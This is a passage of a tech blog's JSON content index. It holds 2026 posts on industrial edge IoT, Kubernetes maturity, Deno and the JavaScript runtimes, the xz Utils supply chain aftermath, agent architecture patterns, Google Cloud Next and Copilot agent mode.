Both AWS and Azure need to ensure their edge platforms integrate properly with safety instrumented systems (SIS) and don\u0026rsquo;t introduce new failure modes into critical processes.\nMy Take # I\u0026rsquo;m genuinely excited about industrial edge computing, but I\u0026rsquo;ve been in this industry long enough to remember the early IoT hype cycle of 2015-2018 and how long it took for the reality to catch up with the marketing. The technology is significantly better now, and the cloud providers are committing serious engineering resources rather than just marketing dollars.\nThe choice between AWS and Azure for industrial IoT will often come down to existing cloud relationships and specific industry partnerships. AWS has a head start in general-purpose IoT, while Azure has stronger enterprise relationships and the advantage of integrating with the Microsoft ecosystem that many manufacturers already use.\nIf you\u0026rsquo;re an engineering team looking at industrial edge computing, my advice is to start small. Pick one production line, one use case (predictive maintenance is the easiest win), and build a proof of concept. The platforms are mature enough for production use, but the organizational change management — getting IT and OT teams to collaborate effectively — is usually the harder challenge. 
For cost management at scale, cloud FinOps practices become essential when edge deployments grow beyond single proof-of-concepts.\nThis is part of my ongoing Infrastructure Notes series, covering developments in cloud, infrastructure, and operational technology.\n","date":"23 April 2026","externalUrl":null,"permalink":"/posts/260423-edge-computing-industrial-iot/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS and Azure are aggressively expanding their edge computing offerings for industrial IoT, bringing cloud-native tooling to factory floors and field operations.","title":"Edge Computing Meets IoT — AWS and Azure Race to the Factory Floor","type":"posts"},{"content":"","date":"23 April 2026","externalUrl":null,"permalink":"/tags/iot/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"IoT","type":"tags"},{"content":"","date":"20 April 2026","externalUrl":null,"permalink":"/tags/kubernetes/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Kubernetes","type":"tags"},{"content":"Kubernetes has reached a maturity level where success means invisibility. The platform has gone from \u0026ldquo;exciting but rough\u0026rdquo; to \u0026ldquo;infrastructure that just works,\u0026rdquo; which is exactly what you want from the foundation of your system.\nThe Maturity Arc # Kubernetes 1.32 represents the platform at its current state: steady, backward-compatible improvements focused on operational experience rather than dramatic new capabilities. The sidecar graduation, improved resource management, and simplified policy enforcement reflect a platform that understands its users\u0026rsquo; constraints and addresses real problems.\nThis wasn\u0026rsquo;t always the case. The early days required deep expertise just to keep clusters running. 
Today, managed Kubernetes services from AWS, Google, and Azure have eliminated much of that operational overhead. The complexity has shifted from keeping the control plane running to designing and managing what runs on it.\nThe Abstraction Layer Shift # Platform engineering practices have transformed how teams interact with Kubernetes. Rather than exposing raw Kubernetes to developers, successful teams build abstraction layers — internal developer platforms that provide self-service infrastructure without requiring cluster knowledge.\nThese platforms are built on Kubernetes, but developers rarely interact with it directly. The complexity is hidden behind abstractions that reflect your organization\u0026rsquo;s practices and constraints. This pattern enables the kind of scale and developer productivity that makes sense in 2026.\nSecurity and Compliance # Running containers securely requires discipline. Container security hardening practices go beyond Kubernetes itself — they encompass how you build images, manage access, and monitor runtime behavior.\nRecent vulnerabilities like IngressNightmare remind us that even mature platforms have security concerns. Staying current with updates and understanding potential risks is part of running Kubernetes in production.\nNetworking and Observability # The networking landscape in Kubernetes has evolved significantly. eBPF-based networking through Cilium provides both performance improvements and observability that earlier iptables-based approaches couldn\u0026rsquo;t match. This matters for both efficiency and compliance.\nSpeaking of observability, OpenTelemetry\u0026rsquo;s maturity means you have standard patterns for instrumenting containers and orchestration systems. Logging, metrics, and traces are now unified under a single standard, making it practical to understand complex systems.\nInfrastructure as Code # Managing Kubernetes declaratively requires good infrastructure-as-code tooling. 
OpenTofu and its predecessor Terraform provide the standard patterns, while OpenTofu\u0026rsquo;s maturity as a fork ensures you have viable open-source options free from licensing concerns.\nFor teams already deep in Kubernetes, Crossplane provides infrastructure-as-code through Kubernetes custom resources, eliminating the need for separate tooling.\nRunning AI Workloads # Kubernetes is increasingly the foundation for running ML and AI workloads. GPU infrastructure and NVIDIA\u0026rsquo;s latest capabilities matter enormously for inference workloads, and Kubernetes provides the orchestration layer that makes this practical at scale.\nMemory-aware scheduling, resource management, and the ability to mix CPU and GPU workloads make Kubernetes compelling for AI infrastructure. Docker\u0026rsquo;s Model Runner makes experimentation accessible, while Kubernetes provides production-grade infrastructure.\nEdge and Distributed Deployments # Kubernetes isn\u0026rsquo;t just for data centers anymore. Edge computing and industrial IoT deployments increasingly run Kubernetes for consistent orchestration across heterogeneous infrastructure. The ability to deploy and manage workloads consistently from cloud to edge is becoming a significant value proposition.\nCost Management and FinOps # At scale, Kubernetes infrastructure costs matter enormously. Cloud cost optimization and FinOps practices help teams understand and manage their infrastructure spend. Resource requests and limits, autoscaling policies, and reserved capacity all impact cost.\nSupporting Agent Systems # As agent-based systems become more common, Kubernetes provides the orchestration foundation for running them reliably. Agents often need to scale independently of traditional services, access diverse APIs, and maintain state across multiple invocations. 
Kubernetes handles all of this.\nFuture Directions # The next frontiers for Kubernetes include better support for WebAssembly workloads (beyond containers), improved multi-cluster management, and tighter integration with AI/ML workflows. WebAssembly component adoption represents one path for more efficient workloads.\nMy Take # Kubernetes won. Not in a competitive sense, but in the sense that it became the de facto standard for container orchestration. The platform is mature enough that the interesting work isn\u0026rsquo;t about Kubernetes itself — it\u0026rsquo;s about what you build on top of it.\nFor teams still evaluating whether to use Kubernetes: the answer is almost certainly yes. The ecosystem is mature, the tooling is good, and managed services eliminate most operational pain. The real question is how you build platforms on top of Kubernetes that give developers the abstractions they need without exposing unnecessary complexity.\nThe maturity is permanent. Kubernetes will continue to improve and evolve, but it\u0026rsquo;s no longer the source of operational stress it once was. That\u0026rsquo;s progress worth celebrating.\n","date":"20 April 2026","externalUrl":null,"permalink":"/posts/260420-kubernetes-container-orchestration-maturity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The evolution of Kubernetes from novel technology to boring infrastructure, and what that means for teams running containerized workloads.","title":"Kubernetes \u0026 Container Orchestration — From Infrastructure to Invisible Foundation","type":"posts"},{"content":"","date":"20 April 2026","externalUrl":null,"permalink":"/series/kubernetes--containers/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Kubernetes \u0026 Containers","type":"series"},{"content":"Deno 2.3 dropped this week with workspace support for monorepos and further improvements to Node.js compatibility. 
Meanwhile, Bun continues to iterate rapidly, and Node.js itself keeps absorbing good ideas from its competitors. After years of runtime fragmentation anxiety, I\u0026rsquo;m starting to think the JavaScript server-side ecosystem is reaching a productive equilibrium. Let me explain why.\nWhat\u0026rsquo;s New in Deno 2.3 # The headline feature in Deno 2.3 is native workspace support. If you\u0026rsquo;re managing a monorepo with multiple packages — and who isn\u0026rsquo;t these days — Deno now handles cross-package dependencies, shared configurations, and coordinated builds without external tooling. This closes one of the biggest gaps that kept teams from adopting Deno for larger projects.\nThe workspace implementation is thoughtful. Each workspace member gets its own deno.json configuration, but they inherit from a root configuration. This approach mirrors unified Python tooling consolidation where simpler configuration hierarchies improve developer experience. Dependencies can be shared across the workspace or scoped to individual packages. The lockfile is unified, preventing version conflicts between packages. If you\u0026rsquo;ve dealt with the complexity of npm workspaces, yarn workspaces, or pnpm workspaces, you\u0026rsquo;ll appreciate how clean this feels.\nNode.js compatibility continues to improve. Deno 2.3 now supports over 95% of npm packages without any compatibility flags or shims. The remaining 5% are packages that rely on Node.js-specific internals or native addons with Node-specific build systems. For most practical applications, you can now drop Deno into an existing Node.js project and it just works.\nThe built-in toolchain also got updates: deno fmt now supports CSS and HTML formatting, deno lint has new rules for accessibility in JSX, and deno test gained snapshot testing. 
These built-in tools continue to be one of Deno\u0026rsquo;s strongest selling points — no need to configure Prettier, ESLint, and Jest separately.\nThe State of the Three-Runtime Landscape # Let me step back and look at the bigger picture. We now have three serious JavaScript/TypeScript runtimes: Node.js, Deno, and Bun. Two years ago, this felt like chaos. Today, it feels like healthy competition that\u0026rsquo;s driving all three to improve.\nNode.js remains the default for most teams, and for good reason. The ecosystem is massive, the tooling is mature, and the long-term support model gives enterprises confidence. Node 22, currently in LTS, brought native TypeScript support via type stripping, a stable permission model inspired by Deno, and significant performance improvements. Node.js is no longer the \u0026ldquo;boring, old\u0026rdquo; option — it\u0026rsquo;s actively incorporating the best ideas from its competitors.\nBun carved out a niche as the performance-focused runtime. Its bundler, test runner, and package manager are all blazing fast, and for projects where build time and startup time matter — think serverless functions, CLI tools, edge computing — Bun offers real advantages. The 1.x series has been stable enough for production use, and I know several teams running Bun in production without issues.\nDeno is positioning itself as the \u0026ldquo;correct by default\u0026rdquo; runtime. Security permissions, TypeScript support, web-standard APIs, built-in tooling — it\u0026rsquo;s the runtime that makes the right thing easy and the wrong thing hard. The 2.x series removed the friction that kept teams from adopting it, particularly around npm compatibility.\nWhy This Competition Is Healthy # I\u0026rsquo;ve seen people lament JavaScript runtime fragmentation, but I think the competition has been enormously beneficial. 
Consider what Node.js has adopted from its competitors in the past two years: built-in TypeScript support (from Deno\u0026rsquo;s influence), a permission model (directly from Deno), improved test runner (Bun showed how good built-in testing could be), and faster startup times (competitive pressure from Bun).\nWithout Deno and Bun pushing the boundaries, Node.js would still require a separate TypeScript compiler, a pile of configuration files, and five different tools for tasks that should be built in. Competition created convergence toward better defaults.\nThe ecosystem is also more portable than people fear. Well-written JavaScript and TypeScript code runs on all three runtimes with minimal changes. The web-standard API convergence — using fetch, Request, Response, Web Streams — means that most code doesn\u0026rsquo;t rely on runtime-specific APIs. The WinterCG (Web-interoperable Runtimes Community Group) has been instrumental in driving this standardization.\nChoosing a Runtime in 2026 # So which runtime should you use? My pragmatic advice:\nChoose Node.js if you\u0026rsquo;re building enterprise applications with large teams, need maximum ecosystem compatibility, or require long-term support guarantees. It\u0026rsquo;s the Toyota Camry of runtimes — reliable, well-supported, and nobody ever got fired for choosing it.\nChoose Deno if you\u0026rsquo;re starting a new project, value security defaults, want a batteries-included development experience, or are building with TypeScript from the start. The developer experience is genuinely superior for greenfield projects.\nChoose Bun if performance is your primary concern — serverless functions, CLI tools, build-heavy workflows — or if you\u0026rsquo;re in an environment where startup time directly impacts user experience.\nFor most of my consulting work, I recommend Node.js for existing projects and Deno for new ones. 
I explored the JavaScript runtime landscape at the start of this year, and the convergence has only accelerated since. The Bun Rust rewrite demonstrates how language choices and performance optimization continue to drive runtime innovation. This parallels how Node.js supply chain security concerns are driving more deliberate ecosystem choices. The code you write is increasingly portable between the three runtimes, reflecting standards like those in WebAssembly components.\nMy Take # The JavaScript runtime landscape in 2026 is healthier than it\u0026rsquo;s ever been. Competition has driven innovation, standards have reduced fragmentation, and developers have genuine choices without catastrophic lock-in. Deno 2.3\u0026rsquo;s workspace support removes one of the last practical barriers to adoption for team-based projects.\nWhat I\u0026rsquo;m most excited about is the meta-trend: all three runtimes are moving toward batteries-included, secure-by-default, TypeScript-native experiences. Tooling like Biome and unified Python/JavaScript tooling are accelerating this shift toward consolidated, performant developer tools. The days of spending a day configuring your development toolchain before writing any application code are ending. AI-assisted development is also reshaping how we approach testing and quality across all these runtimes, which are gaining better support for agent-based development patterns.\nThis is part of my ongoing Developer Landscape series, tracking the tools, frameworks, and practices shaping modern software development.\n","date":"16 April 2026","externalUrl":null,"permalink":"/posts/260416-deno-2-3-runtime-wars/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Deno 2.3 brings workspace support and improved Node compatibility. 
With Bun maturing and Node.js evolving, the JavaScript runtime landscape is reaching an interesting equilibrium.","title":"Deno 2.3 and the Runtime Wars — Is Server-Side JavaScript Finally Settling?","type":"posts"},{"content":"It\u0026rsquo;s been nearly two years since Andres Freund\u0026rsquo;s accidental discovery of the xz Utils backdoor sent shockwaves through the open source community. This week, the OpenSSF published their annual report on open source supply chain security, and the findings are a mixed bag. We\u0026rsquo;ve made real progress in some areas, but the fundamental vulnerabilities that enabled the xz attack remain largely unaddressed. As someone who\u0026rsquo;s relied on open source infrastructure for my entire career, this hits close to home.\nWhat the OpenSSF Report Found # The numbers tell an interesting story. Adoption of SLSA (Supply Chain Levels for Software Artifacts) frameworks has roughly tripled since the xz incident. More projects now publish SBOMs (Software Bill of Materials), and the Sigstore ecosystem has seen massive growth — over 40 million signatures recorded in the public transparency log. Package registries like npm, PyPI, and crates.io have all implemented or strengthened mandatory two-factor authentication for maintainers of popular packages. This parallels broader security infrastructure improvements we\u0026rsquo;ve seen in cloud security responses and enterprise patch management strategies.\nThese are genuine improvements. Before the xz incident, supply chain security felt like an abstract concern that security teams worried about and developers ignored. Now there\u0026rsquo;s real tooling, real adoption, and real investment. 
The OpenSSF\u0026rsquo;s Scorecard project rates over 1.2 million repositories, giving consumers visibility into the security practices of the software they depend on.\nBut here\u0026rsquo;s the uncomfortable truth: none of these measures would have prevented the xz attack.\nThe Social Engineering Gap # The xz backdoor wasn\u0026rsquo;t a technical exploit of a build system or a compromised dependency. It was a multi-year social engineering campaign where the attacker built trust within the project community, gradually took over maintenance, and then introduced the backdoor through a series of seemingly innocuous changes. No SBOM, no code signing, no scorecard would have caught this because the attacker was the trusted maintainer. This represents a pattern we\u0026rsquo;ve seen repeat across the ecosystem — from the Ultralytics supply chain attack to PyTorch Lightning malware — where attackers gain legitimate access before injecting malicious code.\nThis is the hardest problem in open source security, and we still don\u0026rsquo;t have good answers. How do you verify the intentions of a contributor? How do you distinguish a helpful new maintainer from a sophisticated threat actor playing a long game? The uncomfortable answer is that you often can\u0026rsquo;t.\nSome projects have responded by requiring multiple maintainer sign-off for releases, which helps but also increases the burden on already-overworked volunteers. The Linux kernel has long had a culture of rigorous review, but most open source projects don\u0026rsquo;t have the contributor base to sustain that level of scrutiny. Organizations like npm have learned this lesson the hard way through repeated supply chain compromises and are now mandating stricter governance, reflecting lessons from earlier major incidents like SolarWinds.\nThe Maintainer Sustainability Crisis # The deeper issue that the xz incident exposed — and that we still haven\u0026rsquo;t addressed — is maintainer sustainability. 
Jia Tan was able to take over xz Utils in part because the original maintainer was burned out and struggling with mental health issues. This isn\u0026rsquo;t unique to xz; it\u0026rsquo;s the default state of countless critical open source projects maintained by one or two unpaid volunteers. The broader development tooling and language ecosystem has faced similar pressures as maintainers of popular packages burn out from volunteer work.\nThe OpenSSF and Linux Foundation have launched funding programs, but the scale doesn\u0026rsquo;t match the problem. Thousands of projects that form the foundation of modern infrastructure are maintained by individuals who do it in their spare time for no compensation. These maintainers are single points of failure, and they\u0026rsquo;re exhausted.\nSome companies have stepped up. Google\u0026rsquo;s Assured Open Source Software program now covers over 2,000 packages with paid security review. GitHub\u0026rsquo;s Sponsors program has grown. The GitHub Actions supply chain attack demonstrated that even well-funded platforms need continuous security improvements. But these efforts collectively cover a tiny fraction of the open source ecosystem.\nTechnical Mitigations That Actually Help # While we can\u0026rsquo;t solve the social engineering problem completely, there are technical approaches that reduce the blast radius of a compromised maintainer. Reproducible builds — where anyone can independently verify that a binary was built from the claimed source code — would have caught the xz backdoor, since the malicious code was injected during the build process, not visible in the source repository.\nProjects like Reproducible Builds have been advocating for this for years, and adoption is growing but still limited. I wrote about SLSA adoption accelerating recently, and reproducibility is one of the areas where progress has been slowest. Debian now has over 95% of packages reproducible, which is impressive. 
But most software distribution channels don\u0026rsquo;t verify reproducibility, making it a theoretical rather than practical defense. The TanStack npm compromise earlier this year showed that even automated tooling can miss malicious injections until they\u0026rsquo;re already in the wild.\nAnother promising approach is build provenance attestation — cryptographic proof of how, when, and where a software artifact was built. GitHub Actions now generates SLSA provenance attestations automatically, and npm has started verifying these attestations during package installation. This creates an auditable chain from source code to deployed artifact that\u0026rsquo;s much harder to subvert. Cloud platform advances are enabling better build verification and attestation at scale. These mechanisms are essential for combating malware campaigns that exploit transparency gaps in package ecosystems.\nMy Take # Two years after xz, I\u0026rsquo;d give the industry a C+ on supply chain security. We\u0026rsquo;ve built better tools, adopted better practices, and raised awareness. But we haven\u0026rsquo;t addressed the root causes: maintainer burnout, underfunding of critical infrastructure, and the inherent trust assumptions in open source collaboration. Governance gaps persist across ecosystems, revealing how deeply supply chain vulnerabilities remain woven into our infrastructure.\nThe cynical view is that we\u0026rsquo;ll forget about supply chain security until the next major incident. I hope that\u0026rsquo;s wrong, but the pattern is familiar — a crisis drives investment, attention fades, investment slows, and the cycle repeats. Just as we saw with zero-day patch cycles and state-sponsored breaches, the security community is caught in an endless loop of response and recovery.\nWhat can you do individually? Audit your dependency tree. Know which packages you depend on and who maintains them. Contribute back — not just code, but funding, bug reports, documentation. 
And if you\u0026rsquo;re building security tools, focus on the maintainer experience. The best security measure is one that maintainers actually adopt because it makes their lives easier, not harder.\nFor organizations, governance frameworks and policy implementation around software supply chain risk are increasingly becoming regulatory requirements, not just best practices. The ransomware ecosystem continues to evolve with sophisticated attack patterns that often start with supply chain compromise, and proactive defense strategies are increasingly critical.\nThe industry\u0026rsquo;s response to xz demonstrates that we can coordinate at scale. We have the tools, the awareness, and the motivation. Whether we maintain that momentum when the news cycles move on to the next crisis remains the question.\nThe open source ecosystem is the most extraordinary collaborative achievement in the history of software engineering. It deserves better than the neglect we\u0026rsquo;ve given it.\nThis is part of my ongoing Security in Practice series, exploring real-world security challenges and practical responses.\n","date":"9 April 2026","externalUrl":null,"permalink":"/posts/260409-xz-utils-supply-chain-anniversary/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Nearly two years after the xz Utils backdoor shocked the open source world, the supply chain security landscape has changed — but not enough.","title":"The xz Utils Aftermath — One Year Later, What Have We Actually Fixed?","type":"posts"},{"content":"Agent-based systems represent a fundamental shift in how we architect software. Rather than request-response systems where humans interact with tools, agents observe state, plan actions, and execute autonomously. Understanding the patterns that make these systems work is essential for building them responsibly.\nFoundation: Reasoning and Planning # At the heart of every agent is reasoning. 
The rise of agent-based systems shows us that this isn\u0026rsquo;t theoretical — agents are in production, handling real workflows. The capability to reason over multiple steps, adapt to failures, and recover gracefully is what distinguishes agents from traditional chatbots.\nThis reasoning capability comes from advances in model architecture. Extended thinking models introduce deliberate reasoning steps, while reasoning-focused models prioritize deep thinking over speed. These capabilities are what make autonomous planning actually work.\nThe Tooling Layer # Agents are only as good as the tools they can access. Model context protocol adoption standardizes how agents discover and interact with APIs and data sources. But before you standardize, you need to build a robust tool layer.\nThis means clear API contracts, proper error handling, and graceful degradation when tools fail. Agents need detailed documentation of available tools, and that documentation lives in the context window.\nComputer Use and Direct Interaction # Early agents were constrained to calling well-defined APIs. Anthropic\u0026rsquo;s computer use capabilities changed that by letting agents interact directly with systems — clicking buttons, filling forms, navigating UIs. This massively expands what agents can accomplish, but also introduces new failure modes.\nIntegration with Development Workflows # The most immediate application of agent-based systems for developers is in code generation and testing. GitHub Copilot\u0026rsquo;s agent mode represents one major milestone, while AI-assisted testing shows how agents help validate the code they generate.\nThese applications benefit from Docker\u0026rsquo;s Model Runner and similar tools that make running models accessible in development environments. 
The ability to experiment locally, then scale, is essential for building reliable agent systems.\nObservability and Monitoring # If you don\u0026rsquo;t understand what your agent is doing, you can\u0026rsquo;t trust it. OpenTelemetry\u0026rsquo;s maturity and its comprehensive logging, metrics, and tracing capabilities make it practical to instrument agent systems thoroughly.\nLog every reasoning step, every tool call, every decision. When something goes wrong, you need full visibility. Observability should be built in from the beginning, not bolted on.\nCost and Resource Management # Agents with large context windows and multiple reasoning loops can rack up significant costs. Cloud cost optimization becomes critical at scale.\nThe infrastructure supporting agents also matters. Kubernetes and modern orchestration provide the foundation for scaling agent workloads reliably, while platform engineering practices ensure operators have good visibility and control.\nGovernance and Compliance # Autonomous systems that take actions without human intervention require governance. The EU AI Act sets specific requirements for systems making consequential decisions, and agent systems often fall into this category.\nTeams building agents need to implement robust audit trails, human oversight capabilities, and decision monitoring from the start. This isn\u0026rsquo;t optional bureaucracy — it\u0026rsquo;s the foundation of systems that operate safely at scale.\nSupply Chain and Safety # As agents become more capable, the supply chain and safety implications grow. Supply chain security best practices apply to AI systems as much as to traditional software. Know where your models come from, how they\u0026rsquo;re built, and what guarantees they provide.\nReal-World Challenges # In production, agents face real constraints. The broader ecosystem continues to mature, with frameworks and tools designed specifically for building reliable agents. 
Cost management, consistency, and hallucination remain challenges, but they\u0026rsquo;re engineering problems we know how to address.\nMy Take # Agent-based systems aren\u0026rsquo;t coming — they\u0026rsquo;re here. The architecture patterns are emerging, the tooling is maturing, and teams are deploying them successfully. The question for your organization is: which of your workflows are appropriate for autonomous execution, and what do you need to build responsibly?\nThe teams that start building now with proper observability, governance, and cost management will have significant advantages. Those that try to retrofit these concerns later will struggle. Treat your agents like critical systems from day one, because once they\u0026rsquo;re in production, they will be.\n","date":"5 April 2026","externalUrl":null,"permalink":"/posts/260405-agent-systems-architecture-patterns/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Explore architecture patterns for building agent-based systems, from reasoning loops to tool integration and operational governance.","title":"Agent Systems Architecture Patterns — Building Autonomous Decision-Making Systems","type":"posts"},{"content":"","date":"5 April 2026","externalUrl":null,"permalink":"/tags/systems-design/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Systems Design","type":"tags"},{"content":" Overview # The cloud platform landscape evolves constantly. AWS, Azure, and Google Cloud announce new services, pricing changes, and strategic pivots regularly. 
This series monitors these changes—analyzing what new services mean for architects, understanding pricing implications, and tracking strategic moves that signal where cloud computing is heading.\nStaying informed helps you avoid technical debt, take advantage of new capabilities, and make cost-effective platform decisions.\nWhat You\u0026rsquo;ll Find Here # New Service Announcements: Deep-dive analysis of major new services from the cloud providers—what problem do they solve, how do they compare to existing options, and should you consider them?\nPricing Changes: Understanding pricing dynamics, comparing costs across providers, and identifying optimization opportunities when prices shift.\nFeature Evolution: Improvements to existing services, capability additions, and how services compete for workload migration.\nStrategic Positioning: Which bets are the cloud providers making (AI, data, serverless), and what does that signal about the market?\nMulti-Cloud Trends: Hybrid cloud, multi-cloud strategies, and the tooling that reduces vendor lock-in.\nMarket Dynamics: Competitive positioning, market share shifts, and acquisitions reshaping the platform ecosystem.\nLearning Path # Understand the major cloud providers — their service portfolios, strengths, and strategic differences Track pricing carefully — understand cost implications of new services and pricing changes Evaluate new services — frameworks for determining if new capabilities solve your problems Plan architecture strategically — decisions that avoid lock-in while leveraging platform strengths Monitor competitive dynamics — recognize shifts in market leadership and changing platform strategies Key Platforms \u0026amp; Services Covered # AWS: EC2, Lambda, S3, RDS, DynamoDB, and emerging AI services Azure: Virtual Machines, Cosmos DB, App Service, and Microsoft-specific integration Google Cloud: Compute Engine, BigQuery, Vertex AI, and data/analytics focus Emerging Players: Hetzner, Vultr, and niche cloud 
providers Pricing Models: On-demand, reserved instances, spot/preemptible pricing, and data transfer costs Strategic Services: AI/ML platforms, serverless, managed databases, and containerization Related Series # Explore complementary areas: Cloud Operations (operating on cloud platforms), Kubernetes \u0026amp; Containers (container infrastructure across clouds)\n","date":"2 April 2026","externalUrl":null,"permalink":"/series/cloud-platform-watch/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Cloud Platform Watch","type":"series"},{"content":"Google Cloud Next wrapped up in Las Vegas this week, and while the AI announcements grabbed headlines, the most significant developments were in the platform engineering space. Google is clearly betting that the next phase of cloud adoption isn\u0026rsquo;t about raw infrastructure — it\u0026rsquo;s about making developers productive. After attending virtually and digesting the keynotes, here\u0026rsquo;s what matters for practitioners.\nThe Platform Engineering Push # Google\u0026rsquo;s messaging this year is unmistakable: platform engineering is no longer optional, it\u0026rsquo;s how serious organizations do cloud. This aligns with broader cloud FinOps and engineering ownership trends where platform engineering becomes the foundation of cost-effective cloud operations. The new Cloud Developer Hub is an opinionated developer portal built on Backstage patterns but deeply integrated with GCP services. It provides service catalogs, golden paths for deployment, and self-service infrastructure provisioning — all the things that platform teams have been building manually for the past few years.\nWhat makes this interesting is the level of integration. Developer Hub connects directly to Cloud Build, GKE, Cloud Run, and Artifact Registry, providing a unified experience from code commit to production deployment. 
It\u0026rsquo;s not just a dashboard; it\u0026rsquo;s an actual workflow engine that enforces your organization\u0026rsquo;s standards while staying out of the developer\u0026rsquo;s way.\nGoogle also introduced Application Design Centers — essentially pre-built reference architectures that teams can customize and deploy. Need a microservices setup with proper observability, security boundaries, and CI/CD? Pick a template, customize the parameters, and deploy. I\u0026rsquo;m cautiously optimistic about this. The templates I\u0026rsquo;ve seen are well-architected and avoid the oversimplification that plagues most starter projects.\nGemini in Cloud Operations # The Gemini integration across Google Cloud\u0026rsquo;s operations suite has matured significantly. Gemini for Cloud Operations now provides natural language querying across logs, metrics, and traces. Instead of writing complex MQL queries, you can ask \u0026ldquo;why did latency spike on the payment service at 3 AM?\u0026rdquo; and get a synthesized answer that correlates log entries, metric anomalies, and trace data.\nI\u0026rsquo;ve been skeptical of AI-powered observability — the demos always look better than the reality. But the live demonstrations at Next showed some genuinely impressive root cause analysis. The system identified a cascading failure across three services, traced it back to a connection pool exhaustion in a database proxy, and suggested the specific configuration change needed. That\u0026rsquo;s the kind of analysis that used to take a senior SRE an hour during an incident. This reflects advances in AI-assisted problem solving and observability standardization.\nThe caveat is that this works best within Google\u0026rsquo;s own observability stack. If you\u0026rsquo;re using a mix of Datadog, Grafana, and Google Cloud Monitoring — which many organizations do — the cross-tool correlation is limited. 
Google clearly wants you all-in on their platform, which is a reasonable business strategy but not always practical.\nGKE Autopilot Maturation # GKE Autopilot got several updates that address the complaints I\u0026rsquo;ve heard from teams trying to use it for production workloads. The new fine-grained resource controls let you specify exact CPU and memory ratios, GPU scheduling preferences, and node affinity rules without dropping down to Standard mode. These improvements address the resource management challenges that Kubernetes 1.32 was designed to solve. Spot instance support is now more granular, allowing you to specify which workloads can tolerate preemption and which can\u0026rsquo;t.\nThe new multi-cluster fleet management features are also noteworthy. Managing multiple GKE clusters across regions has always been painful, with configuration drift being the primary headache. Google\u0026rsquo;s fleet-level policy engine now lets you define cluster configurations centrally and enforce them across your entire fleet. It\u0026rsquo;s similar to what tools like Crossplane and Cluster API provide, but integrated natively into GCP\u0026rsquo;s control plane.\nWhat About Multi-Cloud? # The elephant in the room at any single-vendor conference is multi-cloud. Google\u0026rsquo;s messaging has shifted subtly here. Rather than arguing for GCP exclusivity, they\u0026rsquo;re positioning GKE Enterprise (formerly Anthos) as the Kubernetes layer that runs everywhere. The new distributed cloud features let you run GKE on-premises, on other clouds, and at the edge with a consistent management plane.\nThis is pragmatic. Most enterprises I work with run workloads across at least two cloud providers, and trying to fight that reality is a losing battle. Google seems to have accepted this and is competing on developer experience rather than lock-in — which, frankly, is a more sustainable strategy.\nMy Take # Google Cloud Next 2026 felt more focused than previous years. 
Instead of announcing dozens of new services, Google is investing in making existing services work better together. The platform engineering narrative is smart — it addresses the real pain point that most organizations face, which isn\u0026rsquo;t \u0026ldquo;which cloud services should we use?\u0026rdquo; but rather \u0026ldquo;how do we make our developers productive on the cloud we\u0026rsquo;ve already chosen?\u0026rdquo;\nThe Gemini integrations are impressive but need real-world validation. Conference demos are carefully scripted, and production environments are messy, unpredictable places. I\u0026rsquo;ll reserve judgment until I\u0026rsquo;ve used these tools during an actual 3 AM incident.\nIf your organization is already on GCP or considering it, the platform engineering tools announced this week are worth evaluating seriously. If you\u0026rsquo;re a platform team building internal developer platforms, study what Google is doing with Developer Hub — even if you don\u0026rsquo;t use GCP, the patterns and abstractions are well thought out and applicable to any cloud. 
The multi-cloud strategy reflects the reality that infrastructure-as-code tools like Terraform enable consistent deployments across vendors.\nCross-Cluster Topics # This infrastructure hub connects to other topic clusters:\nDevelopment + Infrastructure: See how WebAssembly components, Rust in the Linux kernel, and Python\u0026rsquo;s free-threading revolution are reshaping systems programming and deployment patterns AI + Infrastructure: GTC 2026 AI infrastructure and edge AI/IoT deployments discuss how cloud platforms support AI workloads at scale Security + Infrastructure: xz Utils aftermath and supply chain security governance show how infrastructure teams implement supply chain defense This is part of my ongoing Infrastructure Notes series, covering developments in cloud platforms, DevOps, and infrastructure engineering.\n","date":"2 April 2026","externalUrl":null,"permalink":"/posts/260402-google-cloud-next-2026/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google Cloud Next 2026 put platform engineering front and center, with new tools for developer experience, Gemini-powered operations, and a maturing GKE ecosystem.","title":"Google Cloud Next 2026 — Platform Engineering Takes Center Stage","type":"posts"},{"content":"","date":"26 March 2026","externalUrl":null,"permalink":"/tags/github/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"GitHub","type":"tags"},{"content":"GitHub officially made Copilot\u0026rsquo;s agent mode generally available this week, and the developer community is buzzing. After months in preview, the feature that lets Copilot autonomously plan, write, and iterate on multi-step coding tasks is now available to all Copilot subscribers. 
Having spent considerable time with the preview, I have some thoughts on where this fits in a professional workflow — and where it doesn\u0026rsquo;t.\nFrom Autocomplete to Autonomous Agent # The evolution of Copilot has been fascinating to watch. What started as a fancy autocomplete tool in 2021 has steadily grown into something far more ambitious. Agent mode represents a fundamental shift: instead of suggesting the next line of code, Copilot can now take a high-level instruction — \u0026ldquo;add authentication to this API endpoint\u0026rdquo; or \u0026ldquo;refactor this module to use the repository pattern\u0026rdquo; — and autonomously determine which files to edit, what changes to make, run terminal commands, and iterate based on errors.\nUnder the hood, agent mode leverages the latest foundation models from OpenAI and Anthropic, combined with GitHub\u0026rsquo;s deep understanding of repository context. This represents the broader evolution of AI-powered development tools. It reads your project structure, understands your coding conventions, and attempts to produce changes that feel like they belong in your codebase. The key word there is \u0026ldquo;attempts.\u0026rdquo;\nWhat Actually Works Well # I\u0026rsquo;ve been using agent mode in preview across several projects, and there are genuine bright spots. For boilerplate-heavy tasks — setting up new API routes, creating test scaffolding, adding standard CRUD operations — it\u0026rsquo;s remarkably effective. What used to take me 30 minutes of tedious copy-paste-modify work now takes about 5 minutes of reviewing and tweaking agent output.\nThe terminal integration is particularly impressive. When agent mode writes code that doesn\u0026rsquo;t compile or fails tests, it reads the error output and iterates. 